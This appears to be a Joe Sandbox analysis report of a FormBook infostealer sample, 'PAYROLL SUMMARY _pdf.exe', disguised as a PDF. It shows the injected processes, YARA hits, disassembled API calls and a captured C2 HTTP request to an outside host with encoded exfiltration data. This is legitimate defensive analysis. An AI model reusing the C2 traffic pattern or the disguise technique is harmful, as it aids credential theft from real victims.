72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 52 75 79 38 73 52 6c 33 31 30 2f 71 6d 76 2b 49 61 30 66 6d 45 36 58 45 56 4c 2b 41 32 30 68 65 45 57 44 7a 62 6b 33 63 33 57 61 37 4a 75 36 4a 38 33 5a 33 4e 4f 59 62 77 38 72 33 58 44 71 41 45 78 63 73 4e 6e 51 6d 55 76 59 72 47 39 39 53 48 6a 48 45 78 71 47 58 54 61 65 4c 50 78 42 4c 49 67 68 6f 6a 34 50 30 6e 71 6c 4b 78 55 78 6d 71 53 43 47 69 5a 59 46 39 75 52 75 37 59 2f 5a 31 63 4c 79 61 46 61 6a 5a 44 46 58 2f 54 36 41 69 66 43 76 52 30 62 58 53 55 34 50 5a 57 78 77 [TRUNCATED] Data Ascii: _Z1XhZu=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAI39wnI2KbDFyAcgWgRi8HpsX5daatObl6uPB9WE7Sxz2zCPgfza0n3Ng/iAvb2FMdoQiQiNaF0VJi2ueZDzXwqEFemQwXN/NkPwPuhHlS4bJlD7rgiNi5hmBDFCn+2OAORuy8sRl310/qmv+Ia0fmE6XEVL+A20heEWDzbk3c3Wa7Ju6J83Z3NOYbw8r3XDqAExcsNnQmUvYrG99SHjHExqGXTaeLPxBLIghoj4P0nqlKxUxmqSCGiZYF9uRu7Y/Z1cLyaFajZDFX/T6AifCvR0bXSU4PZWxwfJT254XPwa9pf9GE1x7/FqZ6roRXEB5kv1S/1W3EBIoCe+dgTVSXmfUn+PuYWK/vUZcv6bGmVpnaP/41yJ9L10Xu16niuy86upZ8jIyq7Ko2ETJIo+GcN2n2l36/43FIHYw1HVvR+aX+wyI1DDTigMPb+dk4gsJndAkV4XkE4/ebGhWH2b7iyHdGKxPVVc+Yg62RRQk3upLn+qu6qEreTNfDrnoPZlmiA/+Ljul9mWqsQxyae5VqolNJP5tdNlICrN6c1SpkUAAStrmUGBNd5vx5sjk7gftP/kv3vcfU057mRg9IMZsAGLB1NBgVeRoBwUshNQLYvvtxOYm4rzHrU5fCQrPX0jq78XuZHPuD70O2GeJ2SVY2z/1uvv2X0HGfepLRJtrP38ch6uS1kmEMEemZl6+/iVBXI0KGTqk/QJ5RuCktC7lDforkxNKKYt3rl5vGU4cN0klrbdDMMKZXpiMU63Vv0G6QMD/Sd080nMrzUOMvJY1W+DSlXW+z87cdM3uvktrcWwGDT/UjbLvTmwawdmVjfbL/0aVWu5lJmCtQa5TWppQUHIwj/qibMpaR7WzMWMshpiLay8utKE1404Cv1l0RPXvOwMpmhIljArG7bOMQgKRnJ1CtxxVXxc4Ci4JqjaoSCvDcr9tZoEN8bcmVslc1wpKfvH [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49765	172.67.210.102	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:51.282494068 CEST	520	OUT	GET /lfkn/?_Z1XhZu=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT/Cuco6m6gy32+9+fxoWaIs9y0g2xUERgGBbxDKDcI36aN6mbjHo=&f6Gp=VzB4OR5 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.dmtxwuatbz.cc Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Target ID:	0
Start time:	02:40:01
Start date:	09/08/2024
Path:	C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe"
Imagebase:	0x250000
File size:	1'272'832 bytes
MD5 hash:	61B505C361C46A4C09A1E07FF7E168C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:40:02
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe"
Imagebase:	0xbf0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2332296074.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2332296074.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2332905826.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2332905826.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2331839208.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2331839208.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:40:13
Start date:	09/08/2024
Path:	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe"
Imagebase:	0xca0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4606833986.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4606833986.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:40:15
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\clip.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\clip.exe"
Imagebase:	0xd60000
File size:	24'576 bytes
MD5 hash:	E40CB198EBCD20CD16739F670D4D7B74
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4606796602.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4606796602.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4606685527.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4606685527.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4599444998.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4599444998.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:40:29
Start date:	09/08/2024
Path:	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe"
Imagebase:	0xca0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	02:40:40
Start date:	09/08/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	4.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	186

Executed Functions

Function 00253B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00253B7A
IsDebuggerPresent.KERNEL32 ref: 00253B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,003162F8,003162E0,?,?), ref: 00253BFD

Part of subcall function 00257D2C: _memmove.LIBCMT ref: 00257D66

Part of subcall function 00260A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00253C26,003162F8,?,?,?), ref: 00260ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00253C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003093F0,00000010), ref: 0028D4BC
SetCurrentDirectoryW.KERNEL32(?,003162F8,?,?,?), ref: 0028D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00305D40,003162F8,?,?,?), ref: 0028D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0028D581

Part of subcall function 00253A58: GetSysColorBrush.USER32(0000000F), ref: 00253A62
Part of subcall function 00253A58: LoadCursorW.USER32(00000000,00007F00), ref: 00253A71
Part of subcall function 00253A58: LoadIconW.USER32(00000063), ref: 00253A88
Part of subcall function 00253A58: LoadIconW.USER32(000000A4), ref: 00253A9A
Part of subcall function 00253A58: LoadIconW.USER32(000000A2), ref: 00253AAC
Part of subcall function 00253A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00253AD2
Part of subcall function 00253A58: RegisterClassExW.USER32(?), ref: 00253B28

Part of subcall function 002539E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00253A15
Part of subcall function 002539E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00253A36
Part of subcall function 002539E7: ShowWindow.USER32(00000000,?,?), ref: 00253A4A
Part of subcall function 002539E7: ShowWindow.USER32(00000000,?,?), ref: 00253A53

Part of subcall function 002543DB: _memset.LIBCMT ref: 00254401
Part of subcall function 002543DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002544A6

Strings

runas, xrefs: 0028D575
This is a third-party compiled AutoIt script., xrefs: 0028D4B4
%., xrefs: 00253C56

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%.
API String ID: 529118366-1956105530
Opcode ID: e25676d61deafab1eb90a74383e91603e098018489cdd80e1f93870c8f485df6
Instruction ID: 59d8eed42459e21dd195f8b074aa155227b825055d47b53e2cd0005dfe8ca2a6
Opcode Fuzzy Hash: e25676d61deafab1eb90a74383e91603e098018489cdd80e1f93870c8f485df6
Instruction Fuzzy Hash: 2F511D34D25249AACF12EBF4EC16DED7B78AB08341F048466FC51621A1DA744A6ACF28

Function 00254FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00254EEE,?,?,00000000,00000000), ref: 00254FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00254EEE,?,?,00000000,00000000), ref: 00255010
LoadResource.KERNEL32(?,00000000,?,?,00254EEE,?,?,00000000,00000000,?,?,?,?,?,?,00254F8F), ref: 0028DD60
SizeofResource.KERNEL32(?,00000000,?,?,00254EEE,?,?,00000000,00000000,?,?,?,?,?,?,00254F8F), ref: 0028DD75
LockResource.KERNEL32(N%,?,?,00254EEE,?,?,00000000,00000000,?,?,?,?,?,?,00254F8F,00000000), ref: 0028DD88

Strings

SCRIPT, xrefs: 00255006
N%, xrefs: 0028DD85

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT$N%
API String ID: 3051347437-2837872219
Opcode ID: ec0d60ce87896989614fd0c793e80610dd76dcf6720b07d568448345201feb17
Instruction ID: 43d00c22127ba972c37525bb006742be14ea3030ad31e0567ebb1031df3097a6
Opcode Fuzzy Hash: ec0d60ce87896989614fd0c793e80610dd76dcf6720b07d568448345201feb17
Instruction Fuzzy Hash: 6C119A75600701AFE7208B65EC5CF277BB9EBC9B12F24816DF806C62A0DB71EC148664

Function 00254AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00254B2B

Part of subcall function 00257D2C: _memmove.LIBCMT ref: 00257D66

GetCurrentProcess.KERNEL32(?,002DFAEC,00000000,00000000,?), ref: 00254BF8
IsWow64Process.KERNEL32(00000000), ref: 00254BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00254C45
FreeLibrary.KERNEL32(00000000), ref: 00254C50
GetSystemInfo.KERNEL32(00000000), ref: 00254C81
GetSystemInfo.KERNEL32(00000000), ref: 00254C8D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: a6e317016744303d4646555074275dbb9f7681fa32032693a19f8affb6254364
Instruction ID: 50d929ba09f6c232c687ded54723795641b7c2fa51d57130333c49e7298bffdb
Opcode Fuzzy Hash: a6e317016744303d4646555074275dbb9f7681fa32032693a19f8affb6254364
Instruction Fuzzy Hash: 8A91243186A7C0DEC731EF6894511AAFFE4AF25305B444A5ED4CB83A81D270E95CCB1D

Function 0025E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Dt1, xrefs: 0025EC21
Dt1, xrefs: 00293F58
Dt1, xrefs: 0025EC1A
Dt1, xrefs: 00293F1F
Variable must be of type 'Object'., xrefs: 0029428C

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID: Dt1$Dt1$Dt1$Dt1$Variable must be of type 'Object'.
API String ID: 0-2946129658
Opcode ID: 00cb583b380fbba00f747dd22af45bd8fae2910dbdba3e00ee00d8e81fc735ee
Instruction ID: cbf32ec86618798262ec17d5e474bc6d3d11be96d39986b33dddbb457018ecbc
Opcode Fuzzy Hash: 00cb583b380fbba00f747dd22af45bd8fae2910dbdba3e00ee00d8e81fc735ee
Instruction Fuzzy Hash: 92A2AD74A24206CFCF28CF58C580AA9B7B1FF48315F258059ED06AB351D770EE6ACB85

Function 002B4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0028E7C1), ref: 002B46A6
FindFirstFileW.KERNELBASE(?,?), ref: 002B46B7
FindClose.KERNEL32(00000000), ref: 002B46C7

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 9090f8d3c1a809943e93cd1309883bdf7c1269ea82cbe95ea8e1dc61a758ab0e
Instruction ID: 77b6f01f914546fe24a0364bcf27436134300cb61228d0da3d142c5ce3c124b3
Opcode Fuzzy Hash: 9090f8d3c1a809943e93cd1309883bdf7c1269ea82cbe95ea8e1dc61a758ab0e
Instruction Fuzzy Hash: 4DE0D8318214015B82107738FC8D4EA775C9E06375F100716F836C14E0E7B05D608599

Function 00260B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00260BBB
timeGetTime.WINMM ref: 00260E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00260FB3
TranslateMessage.USER32(?), ref: 00260FC7
DispatchMessageW.USER32(?), ref: 00260FD5
Sleep.KERNEL32(0000000A), ref: 00260FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 0026105A
DestroyWindow.USER32 ref: 00261066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00261080
Sleep.KERNEL32(0000000A,?,?), ref: 002952AD
TranslateMessage.USER32(?), ref: 0029608A
DispatchMessageW.USER32(?), ref: 00296098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002960AC

Strings

pr1, xrefs: 00295BDE
pr1, xrefs: 00295383
@GUI_CTRLHANDLE, xrefs: 0029540E
pr1, xrefs: 0029542D
@TRAY_ID, xrefs: 00295BB9
@COM_EVENTOBJ, xrefs: 0029591A
@GUI_CTRLID, xrefs: 00295364
@GUI_WINHANDLE, xrefs: 002953B9
pr1, xrefs: 002953D8

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr1$pr1$pr1$pr1
API String ID: 4003667617-2604743637
Opcode ID: 90122ef579eba7157902b568cc6a7317c11e28be86701f2bfda47626fea677f3
Instruction ID: 935d315aa07d61bd3547b939eb9122b98344e8fb46e36bd75d9843e9d063f73b
Opcode Fuzzy Hash: 90122ef579eba7157902b568cc6a7317c11e28be86701f2bfda47626fea677f3
Instruction Fuzzy Hash: D8B2E670628752DFDB25DF24C884BAAB7E5BF84304F14491DF84A87291DB71E8A4CF86

Function 002B93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002B91E9: __time64.LIBCMT ref: 002B91F3

Part of subcall function 00255045: _fseek.LIBCMT ref: 0025505D

__wsplitpath.LIBCMT ref: 002B94BE

Part of subcall function 0027432E: __wsplitpath_helper.LIBCMT ref: 0027436E

_wcscpy.LIBCMT ref: 002B94D1
_wcscat.LIBCMT ref: 002B94E4
__wsplitpath.LIBCMT ref: 002B9509
_wcscat.LIBCMT ref: 002B951F
_wcscat.LIBCMT ref: 002B9532

Part of subcall function 002B922F: _memmove.LIBCMT ref: 002B9268
Part of subcall function 002B922F: _memmove.LIBCMT ref: 002B9277

_wcscmp.LIBCMT ref: 002B9479

Part of subcall function 002B99BE: _wcscmp.LIBCMT ref: 002B9AAE
Part of subcall function 002B99BE: _wcscmp.LIBCMT ref: 002B9AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002B96DC
_wcsncpy.LIBCMT ref: 002B974F
DeleteFileW.KERNEL32(?,?), ref: 002B9785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002B979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B97AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B97BE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 12dce03b88a2dc71af5a555768f231d1889330ba425478b489734c38cbda7f1f
Instruction ID: 940ed00e7b169b03f3f052c835c5678b3c6d81b34eea819229f0f7c66e2c2fb5
Opcode Fuzzy Hash: 12dce03b88a2dc71af5a555768f231d1889330ba425478b489734c38cbda7f1f
Instruction Fuzzy Hash: 2EC13CB1D10229AACF21DFA5CC85EDEB7BDEF49340F0040AAF609E7151DB709A948F65

Function 00253015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00253074
RegisterClassExW.USER32(00000030), ref: 0025309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
InitCommonControlsEx.COMCTL32(?), ref: 002530CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
LoadIconW.USER32(000000A9), ref: 002530F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101

Strings

TaskbarCreated, xrefs: 002530A4
0, xrefs: 00253056
AutoIt v3 GUI, xrefs: 00253090
+, xrefs: 0025305D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 9c1952d4b01ae093a1c03c177b557e8cb20db96d65491d42bebb811f23671a27
Instruction ID: d7f3ecfaecfd0092b59fcd9773a87752e11ac1460eedf34cd9d9825116caff36
Opcode Fuzzy Hash: 9c1952d4b01ae093a1c03c177b557e8cb20db96d65491d42bebb811f23671a27
Instruction Fuzzy Hash: B53189B1C41309AFDB41CFE4E989BC9BBF4FB09310F14812AE581E62A0D3B50981CF54

Function 00253041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00253074
RegisterClassExW.USER32(00000030), ref: 0025309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
InitCommonControlsEx.COMCTL32(?), ref: 002530CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
LoadIconW.USER32(000000A9), ref: 002530F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101

Strings

TaskbarCreated, xrefs: 002530A4
0, xrefs: 00253056
AutoIt v3 GUI, xrefs: 00253090
+, xrefs: 0025305D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
